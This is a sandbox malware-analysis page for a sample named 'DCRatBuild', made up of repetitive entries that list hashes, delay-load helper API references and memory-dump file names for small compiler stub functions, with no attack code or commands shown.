Opcode ID: fca896fd5c6d936246a9176ef5eb944ea06e1d92c6c0a8868265bb0d4a3451c1
Instruction ID: 3265938fecce5dde162fba079b0a39d9ff17e5e70146a7ecb39102021dee2563
Opcode Fuzzy Hash: fca896fd5c6d936246a9176ef5eb944ea06e1d92c6c0a8868265bb0d4a3451c1
Instruction Fuzzy Hash: D5B0929226A050AC314452062802C3A02DDD481F1232080BAF82ED4480A840A9002432

Function 00B2E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3ee0ad7f1da48afc3eb05bfa1ae19f272bec1de7afd8afede50884e347befeef
Instruction ID: a59135bd1bc8ea275ec477834fd08544e0567c140756c8d74b1e053feac211cc
Opcode Fuzzy Hash: 3ee0ad7f1da48afc3eb05bfa1ae19f272bec1de7afd8afede50884e347befeef
Instruction Fuzzy Hash: 02B09292269010AC214452162842C3A02DCC082F1232080BAF86DD4480A940EA002431

Function 00B2E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 38d83e50d6c54c6b349b408e8fdc435e02557c0f86a52172995e375193fdd2e5
Instruction ID: 133d97c06193c10f4fa6f38cd0d2347fb8d3c2e5620b28659847b2fbe3490700
Opcode Fuzzy Hash: 38d83e50d6c54c6b349b408e8fdc435e02557c0f86a52172995e375193fdd2e5
Instruction Fuzzy Hash: 30B092A226A150BC218452062802C3A02DDC081F1232081BAF82DD4880A840A9442431

Function 00B2E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 50b31bb8b8b6a62b59875237cd129b311117e7b8b3e61ef56bd1dc45c672d5b7
Instruction ID: 2f662dfa8522ca53029243713ecb1eacbe2caa23b95291d64dde514720a2ac69
Opcode Fuzzy Hash: 50b31bb8b8b6a62b59875237cd129b311117e7b8b3e61ef56bd1dc45c672d5b7
Instruction Fuzzy Hash: 9AB0929226A050AC214452062802C3A02DDC082F1232080BAF86DD4480A840E9002431

Function 00B2E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E3FC

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5d896f40e6e0afbb9c380a5c227167b08761e40ad8386a59cc0fb54645fdc528
Instruction ID: ac2dc4f8ec9cc73201b2fbe7cec991edf5e1808462ea393bc2e621c326d1c312
Opcode Fuzzy Hash: 5d896f40e6e0afbb9c380a5c227167b08761e40ad8386a59cc0fb54645fdc528
Instruction Fuzzy Hash: 1EB092A226A020BC2184D1062802D3602C8C082F21321C0AAF86CCA080E8408A002432

Function 00B2E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E3FC

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5cbb9347c76fb35e37dc7d4038ae6dc44b69bf1a87e00f6dc712545cac27f0dd
Instruction ID: 49b18c42a05b893ca1b83ab70a0a7a6cfece1ac57f09b869269110fe2edd817f
Opcode Fuzzy Hash: 5cbb9347c76fb35e37dc7d4038ae6dc44b69bf1a87e00f6dc712545cac27f0dd
Instruction Fuzzy Hash: 1DB092A226A0206C218491062902D3602C8C081F21331C0AAF52CCA080A84089092432

Function 00B2E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E3FC

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f0cff10db178d8d7906e2ad03b347416e4461c47f90476a6588de34dacd6bece
Instruction ID: ca763294531d38745943f04e4895333bb6848defa9ff25b3e88fd40716e27285
Opcode Fuzzy Hash: f0cff10db178d8d7906e2ad03b347416e4461c47f90476a6588de34dacd6bece
Instruction Fuzzy Hash: A5B092A226A020AC2184D1062802D3602C8C081F21321C0AAF86CCA080E84089042432

Function 00B2E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E580

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cebe5216eca7a1cc86d9847257dbbd2b580d2c5d9c8161f20efe8cfd5941e145
Instruction ID: 60117652974f74ebf5e5db48870130191f7b6c24abed5c3f50c0175b2e2a4032
Opcode Fuzzy Hash: cebe5216eca7a1cc86d9847257dbbd2b580d2c5d9c8161f20efe8cfd5941e145
Instruction Fuzzy Hash: CBB012C227A1207C318451567C03C3702DCC0C1F10332C2EEF43CD6880F8548D442435

Function 00B2E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E580

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5e8f8ae795830d5dc6aa37a137918d965d7cbc3e01afa9c643fc598ebf50baf7
Instruction ID: 0ea6340337eb5224559c5d85d1754f99240ff1687880f81e6579c86ae5224591
Opcode Fuzzy Hash: 5e8f8ae795830d5dc6aa37a137918d965d7cbc3e01afa9c643fc598ebf50baf7
Instruction Fuzzy Hash: 84B0928226A0206C314451566902C3602D8C081F1036282AAF42CD6480F8548A052435

Function 00B2E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E580

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6cd0ec6764bf42fe0612ba5bba566d86fc14262d3e9db57f544bda7f26e4e116
Instruction ID: ef330b0347a003c405047f4f77dd293e1cdc5c087deac93168386caec5e6c238
Opcode Fuzzy Hash: 6cd0ec6764bf42fe0612ba5bba566d86fc14262d3e9db57f544bda7f26e4e116
Instruction Fuzzy Hash: 1DB012C227A0207D314451563C02C3703CCC0C1F20332C0EEF43CE6480F8648D042436

Function 00B2E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E51F

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b6dfd137c99794e880bac794350f0dba8ab2edc93001c272125f069060b35c86
Instruction ID: 71e47610ac8c1202ca3b1d264882cdc8fe61360287608bc643480665f3dca1c6
Opcode Fuzzy Hash: b6dfd137c99794e880bac794350f0dba8ab2edc93001c272125f069060b35c86
Instruction Fuzzy Hash: 0CB092822690107D2144510A2802E3A05C8D082F1032180AEF42CC9080B8408D002432

Function 00B2E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E51F

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 142fa2d149ec5b3e4450c3eca2094669ef330cd6d45397ee50ff553fb4fce88c
Instruction ID: 302ef944a557b18cb70c1bcc4a205c8eff4cf1d84789ef1da21b3aa5e5c6da3d
Opcode Fuzzy Hash: 142fa2d149ec5b3e4450c3eca2094669ef330cd6d45397ee50ff553fb4fce88c
Instruction Fuzzy Hash: 1AB092822690606C2144510A2902D3A09C8C082F10321C0AEF42CC9080B8408D012431

Function 00B2E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E51F

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 86785fccec15a50bb9250d0a5c172880123249d9d7cea8fa37fc9fbe36e3db4a
Instruction ID: 8f17747ab7f404c6698c7064dd085ff33cc44c4016136a51694decff48b9d1ef
Opcode Fuzzy Hash: 86785fccec15a50bb9250d0a5c172880123249d9d7cea8fa37fc9fbe36e3db4a
Instruction Fuzzy Hash: 31B012C23790107C3104112A3C16D3B05CCD0C3F10331C0FEF47CC8481B8408E042432

Function 00B2E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E51F

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 30f63729a9b5aad69f90cf950af89286009e07ed141b431851cc2bd93b4ef61a
Instruction ID: 6040215f6b3aa9ead7290bc34c36f9421d5321b22098c0743cdc4f0c9ec8b990
Opcode Fuzzy Hash: 30f63729a9b5aad69f90cf950af89286009e07ed141b431851cc2bd93b4ef61a
Instruction Fuzzy Hash: 3EB092822691107C2244510A6802D3A05C8C082F1032182AAF42CC9080B8408D442431

Function 00B2E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b49d0d8542ab7ea23419997ff9b6386256c4f42c005bb12cf65965e6abf0df90
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: b49d0d8542ab7ea23419997ff9b6386256c4f42c005bb12cf65965e6abf0df90
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 116bbc4b50c36222c2e3aa38f3f9f366b34158f6cc7703075be3c6004719f59b
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: 116bbc4b50c36222c2e3aa38f3f9f366b34158f6cc7703075be3c6004719f59b
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3ff0b01c1748d1c62397ad6f4c52c596d8ba24a0eb1aa00aa477a87dda5076eb
Instruction ID: 67518671c866bfd3f40070465ba707097f9994aa31e510ab6e25b9b6aa45f5ea
Opcode Fuzzy Hash: 3ff0b01c1748d1c62397ad6f4c52c596d8ba24a0eb1aa00aa477a87dda5076eb
Instruction Fuzzy Hash: 02A011E22AA022BC300822033C03C3B02ACC0C2F2233088BEF82AC8080B880A8002830

Function 00B2E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
